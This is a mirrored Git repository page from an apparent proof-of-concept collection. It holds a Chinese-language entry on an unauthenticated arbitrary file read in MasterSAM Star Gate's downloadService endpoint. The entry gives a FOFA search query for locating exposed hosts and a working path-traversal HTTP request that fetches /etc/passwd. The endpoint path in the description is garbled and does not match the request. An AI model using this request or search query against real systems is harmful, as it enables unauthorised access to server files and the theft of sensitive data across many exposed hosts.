admin/wy876_POC
1
0
Fork 0
mirror of https://github.com/wy876/POC.git synced 2025-02-27 04:39:25 +00:00
Code Issues Packages Projects Releases Wiki Activity
wy876_POC/MasterSAM/MasterSAM接口downloadService任意文件读取.md
wy876 778e39287f 20250221更新
2025-02-21 14:13:58 +08:00

585 B
Raw Blame History

MasterSAM接口downloadService任意文件读取

MasterSAM Star Gate的/adamaladamalduwnoadService接口存在任意文件下载漏洞未经身份验证的攻击者可以通过该漏洞下载服务器任意文件从而获取大量敏感信息。

fofa

body="MasterSAM"

poc

GET /adama/adama/downloadService?type=1&file=../../../../etc/passwd HTTP/1.1
Host: your-ip

图片

漏洞来源